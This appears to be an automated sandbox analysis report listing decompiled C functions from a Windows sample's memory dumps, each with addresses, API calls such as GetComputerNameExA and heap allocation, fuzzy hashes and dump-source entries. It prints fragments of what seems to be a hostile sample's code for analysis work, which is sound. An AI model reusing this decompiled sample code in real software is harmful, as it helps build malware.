                                                                                                                                                                                                    • Instruction ID: 3d8d3eab19714fc172dfac886ed454ac8f70e36f677d60de01465ed89ab4e0c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eda2a450a22bf817af5c1d2cc3c008d6ac39f138a2e54ba01d8621f786c9c9d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21C672800209EFDB209F94CC81FBDB7B4FB14315F14486AE541A7192D3799A85CB58
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0040133E() {
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                    				void _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t26;
                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				intOrPtr* _t37;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 =  *0x404144;
                                                                                                                                                                                                    				if( *0x40412c > 5) {
                                                                                                                                                                                                    					_t16 = _t15 + 0x4050f4;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t16 = _t15 + 0x4050b1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00401B3D(_t16, _t16);
                                                                                                                                                                                                    				_t35 = 6;
                                                                                                                                                                                                    				memset( &_v32, 0, _t35 << 2);
                                                                                                                                                                                                    				if(E0040140B( &_v32,  &_v16,  *0x404140 ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                    					_t25 = 0xb;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t26 = lstrlenW( *0x404138);
                                                                                                                                                                                                    					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                    					_t44 = _t26 + _t8;
                                                                                                                                                                                                    					_t11 = _t44 + 8; // 0xa
                                                                                                                                                                                                    					_t30 = E00401266(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						_t37 = _v36;
                                                                                                                                                                                                    						 *_t37 = _t30;
                                                                                                                                                                                                    						_t32 =  *0x404138;
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							 *(_t37 + 4) = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							memcpy(_t37 + 4, _t32, _t44);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 = E00401E8D(_v28); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				ExitThread(_t25);
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00401344
                                                                                                                                                                                                    0x00401355
                                                                                                                                                                                                    0x0040135f
                                                                                                                                                                                                    0x00401357
                                                                                                                                                                                                    0x00401357
                                                                                                                                                                                                    0x00401357
                                                                                                                                                                                                    0x00401366
                                                                                                                                                                                                    0x0040136f
                                                                                                                                                                                                    0x00401374
                                                                                                                                                                                                    0x00401392
                                                                                                                                                                                                    0x004013ed
                                                                                                                                                                                                    0x00401394
                                                                                                                                                                                                    0x0040139a
                                                                                                                                                                                                    0x004013a0
                                                                                                                                                                                                    0x004013a0
                                                                                                                                                                                                    0x004013ae
                                                                                                                                                                                                    0x004013b2
                                                                                                                                                                                                    0x004013b9
                                                                                                                                                                                                    0x004013bb
                                                                                                                                                                                                    0x004013bf
                                                                                                                                                                                                    0x004013c1
                                                                                                                                                                                                    0x004013c8
                                                                                                                                                                                                    0x004013dc
                                                                                                                                                                                                    0x004013ca
                                                                                                                                                                                                    0x004013d0
                                                                                                                                                                                                    0x004013d5
                                                                                                                                                                                                    0x004013c8
                                                                                                                                                                                                    0x004013e4
                                                                                                                                                                                                    0x004013e4
                                                                                                                                                                                                    0x004013ef

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?), ref: 0040139A
                                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 004013D0
                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 004013EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitThreadlstrlenmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3726537860-0
                                                                                                                                                                                                    • Opcode ID: 00003995d80ac0b152b5b46061f413b851e01edadf5079b503fe0a7f16710d80
                                                                                                                                                                                                    • Instruction ID: d59d404552b84cdd800a364fc43bd1e8ac54e61eadf93532ba2d18893b989970
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00003995d80ac0b152b5b46061f413b851e01edadf5079b503fe0a7f16710d80
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A118E71104205ABE721DFA1DE88E9B77ECAB84344F04083ABA45F75F1E734E5458B9A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E04F68F16(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t40 = E04F66466(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                    						_t68 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t20 = _t68 + 0x4f6e1fc; // 0x740053
                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                    							_t76 = E04F692F3(_a4);
                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t57 = __imp__#6;
                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x04f68f1c
                                                                                                                                                                                                    0x04f68f1f
                                                                                                                                                                                                    0x04f68f2f
                                                                                                                                                                                                    0x04f68f38
                                                                                                                                                                                                    0x04f68f3c
                                                                                                                                                                                                    0x04f6900a
                                                                                                                                                                                                    0x04f69010
                                                                                                                                                                                                    0x04f69010
                                                                                                                                                                                                    0x04f68f56
                                                                                                                                                                                                    0x04f68f5b
                                                                                                                                                                                                    0x04f68f5f
                                                                                                                                                                                                    0x04f68f65
                                                                                                                                                                                                    0x04f68f6a
                                                                                                                                                                                                    0x04f68f71
                                                                                                                                                                                                    0x04f68f80
                                                                                                                                                                                                    0x04f68f80
                                                                                                                                                                                                    0x04f68f84
                                                                                                                                                                                                    0x04f68f86
                                                                                                                                                                                                    0x04f68f92
                                                                                                                                                                                                    0x04f68f9d
                                                                                                                                                                                                    0x04f68fa8
                                                                                                                                                                                                    0x04f68fac
                                                                                                                                                                                                    0x04f68fb6
                                                                                                                                                                                                    0x04f68fba
                                                                                                                                                                                                    0x04f68fbc
                                                                                                                                                                                                    0x04f68fc1
                                                                                                                                                                                                    0x04f68fc8
                                                                                                                                                                                                    0x04f68fd8
                                                                                                                                                                                                    0x04f68fd8
                                                                                                                                                                                                    0x04f68fc1
                                                                                                                                                                                                    0x04f68fba
                                                                                                                                                                                                    0x04f68fda
                                                                                                                                                                                                    0x04f68fdf
                                                                                                                                                                                                    0x04f68fe4
                                                                                                                                                                                                    0x04f68fe4
                                                                                                                                                                                                    0x04f68fe7
                                                                                                                                                                                                    0x04f68ff0
                                                                                                                                                                                                    0x04f68ff5
                                                                                                                                                                                                    0x04f68ff5
                                                                                                                                                                                                    0x04f68ffa
                                                                                                                                                                                                    0x04f68fff
                                                                                                                                                                                                    0x04f68fff
                                                                                                                                                                                                    0x04f68ffa
                                                                                                                                                                                                    0x04f68f84
                                                                                                                                                                                                    0x04f69001
                                                                                                                                                                                                    0x04f69007
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F66466: SysAllocString.OLEAUT32(80000002), ref: 04F664C3
                                                                                                                                                                                                      • Part of subcall function 04F66466: SysFreeString.OLEAUT32(00000000), ref: 04F66529
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 04F68FF5
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(04F66843), ref: 04F68FFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                    • Opcode ID: 09ae60b21f072b0a711ded692a008a4007e9c6ee21ce6a2a581d8b74f0e84bb7
                                                                                                                                                                                                    • Instruction ID: 4c7c84b84542dd792b37c7d4fed26b50d8d3cc00c271d71ee85de02e708bd007
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09ae60b21f072b0a711ded692a008a4007e9c6ee21ce6a2a581d8b74f0e84bb7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84313B71900119EFCB11EF64CC88C9BBBBAFBC97447144658F9169B210D672ED52CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                    			E04F66111(void* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t23 = __imp__;
                                                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                                                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                    				_t10 = _v8;
                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                    					_t20 = E04F68D59(_t10 + 1);
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                    						if(_t15 != 0) {
                                                                                                                                                                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							E04F6677C(_t20);
                                                                                                                                                                                                    							_t20 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f66116
                                                                                                                                                                                                    0x04f66121
                                                                                                                                                                                                    0x04f66123
                                                                                                                                                                                                    0x04f66129
                                                                                                                                                                                                    0x04f6612b
                                                                                                                                                                                                    0x04f66130
                                                                                                                                                                                                    0x04f66139
                                                                                                                                                                                                    0x04f6613d
                                                                                                                                                                                                    0x04f66146
                                                                                                                                                                                                    0x04f6614a
                                                                                                                                                                                                    0x04f66159
                                                                                                                                                                                                    0x04f6614c
                                                                                                                                                                                                    0x04f6614d
                                                                                                                                                                                                    0x04f66152
                                                                                                                                                                                                    0x04f66152
                                                                                                                                                                                                    0x04f6614a
                                                                                                                                                                                                    0x04f6613d
                                                                                                                                                                                                    0x04f66162

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,04F61DD9,7519F710,00000000,?,?,04F61DD9), ref: 04F66129
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,04F61DD9,04F61DDA,?,?,04F61DD9), ref: 04F66146
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 187446995-0
                                                                                                                                                                                                    • Opcode ID: 9790dbabfdd574c39320dccae776a43e21e207aa22891c51a0c3c660faf02536
                                                                                                                                                                                                    • Instruction ID: 5b32293f1bde67ffcd5b6f14afd24d140cdee1e525684d348df0c85d280b6717
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9790dbabfdd574c39320dccae776a43e21e207aa22891c51a0c3c660faf02536
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF05466E00149FAF711DA9A9D00FAF77BCDBC5A90F11005AA915D3251EA70EE029B71
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = 1;
                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                    					if(InterlockedDecrement(0x4f6d23c) == 0) {
                                                                                                                                                                                                    						E04F620BE();
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t4 == 1 && InterlockedIncrement(0x4f6d23c) == 1) {
                                                                                                                                                                                                    						_t10 = E04F61000(_t11, _t12, _a4); // executed
                                                                                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                                                                                    							_t14 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x04f69193
                                                                                                                                                                                                    0x04f69194
                                                                                                                                                                                                    0x04f69197
                                                                                                                                                                                                    0x04f691c9
                                                                                                                                                                                                    0x04f691cb
                                                                                                                                                                                                    0x04f691cb
                                                                                                                                                                                                    0x04f69199
                                                                                                                                                                                                    0x04f6919a
                                                                                                                                                                                                    0x04f691af
                                                                                                                                                                                                    0x04f691b6
                                                                                                                                                                                                    0x04f691b8
                                                                                                                                                                                                    0x04f691b8
                                                                                                                                                                                                    0x04f691b6
                                                                                                                                                                                                    0x04f6919a
                                                                                                                                                                                                    0x04f691d3

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(04F6D23C), ref: 04F691A1
                                                                                                                                                                                                      • Part of subcall function 04F61000: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F691B4,?), ref: 04F61013
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(04F6D23C), ref: 04F691C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                    • Opcode ID: 641d2fc5966089cff43327bda52ec8163b54db4df2424a0899a4756c2780ca01
                                                                                                                                                                                                    • Instruction ID: a31c46d6abf47d07c8fc3ed03f42bb3d1c9dbe4f46612f5688827ad43b28fbf5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 641d2fc5966089cff43327bda52ec8163b54db4df2424a0899a4756c2780ca01
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E04F71704171A3AB312AA49D0CF5AB640DB01A85F111614F9D3D0458D6B0F847EE91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                    			E04F65974(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                    				_t15 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t4 = _t15 + 0x4f6e39c; // 0x5928944
                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                    				_t6 = _t15 + 0x4f6e124; // 0x650047
                                                                                                                                                                                                    				_t17 = E04F68F16(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t23 = 8;
                                                                                                                                                                                                    					if(_v20 != _t23) {
                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t19 = E04F697DE(_t20, _v12);
                                                                                                                                                                                                    						if(_t19 != 0) {
                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                    							_t23 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                    			}










                                                                                                                                                                                                    0x04f6597e
                                                                                                                                                                                                    0x04f65985
                                                                                                                                                                                                    0x04f65986
                                                                                                                                                                                                    0x04f65987
                                                                                                                                                                                                    0x04f65988
                                                                                                                                                                                                    0x04f6598e
                                                                                                                                                                                                    0x04f65993
                                                                                                                                                                                                    0x04f65993
                                                                                                                                                                                                    0x04f6599d
                                                                                                                                                                                                    0x04f659af
                                                                                                                                                                                                    0x04f659b6
                                                                                                                                                                                                    0x04f659e4
                                                                                                                                                                                                    0x04f659b8
                                                                                                                                                                                                    0x04f659ba
                                                                                                                                                                                                    0x04f659bf
                                                                                                                                                                                                    0x04f659e1
                                                                                                                                                                                                    0x04f659c1
                                                                                                                                                                                                    0x04f659c4
                                                                                                                                                                                                    0x04f659cb
                                                                                                                                                                                                    0x04f659d0
                                                                                                                                                                                                    0x04f659d2
                                                                                                                                                                                                    0x04f659d2
                                                                                                                                                                                                    0x04f659d7
                                                                                                                                                                                                    0x04f659d7
                                                                                                                                                                                                    0x04f659bf
                                                                                                                                                                                                    0x04f659eb

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F68F16: SysFreeString.OLEAUT32(?), ref: 04F68FF5
                                                                                                                                                                                                      • Part of subcall function 04F697DE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04F66186,004F0053,00000000,?), ref: 04F697E7
                                                                                                                                                                                                      • Part of subcall function 04F697DE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04F66186,004F0053,00000000,?), ref: 04F69811
                                                                                                                                                                                                      • Part of subcall function 04F697DE: memset.NTDLL ref: 04F69825
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F659D7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                    • Opcode ID: 370cc343e12361548484012b9b7c65c0f2781836e81372c79b13669db230ad86
                                                                                                                                                                                                    • Instruction ID: 6b77eec09d7d7153c34b7e6854a42e29597804eb0a903ae83704b6fa3706b42f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 370cc343e12361548484012b9b7c65c0f2781836e81372c79b13669db230ad86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9017132504129BFDB119FA8ED059AABBB9EF04254F004125EA46F7060E770ED12CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                    			E00401B3D(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				 *0x404150 =  *0x404150 & 0x00000000;
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0x40414c);
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                    				 *0x404148 = 0xc; // executed
                                                                                                                                                                                                    				L004010D6(); // executed
                                                                                                                                                                                                    				return __eax;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00401b3d
                                                                                                                                                                                                    0x00401b44
                                                                                                                                                                                                    0x00401b46
                                                                                                                                                                                                    0x00401b4b
                                                                                                                                                                                                    0x00401b4d
                                                                                                                                                                                                    0x00401b51
                                                                                                                                                                                                    0x00401b5b
                                                                                                                                                                                                    0x00401b60

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(0040136B,00000001,0040414C,00000000), ref: 00401B5B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                                                    • Opcode ID: 1052ab633f25b1ddf97dca5eea6cd0f45291a0988938d4fc2bebe75f76c5dd59
                                                                                                                                                                                                    • Instruction ID: 33074e93a73a186bd16f1c488968ed5b8430df007ca6f380787db44b54e06189
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1052ab633f25b1ddf97dca5eea6cd0f45291a0988938d4fc2bebe75f76c5dd59
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38C04CF4140340A6E620AF419D4EF457A5177E4705F214529B350396E183F910D4851D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F68D59(long _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = RtlAllocateHeap( *0x4f6d238, 0, _a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x04f68d65
                                                                                                                                                                                                    0x04f68d6b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
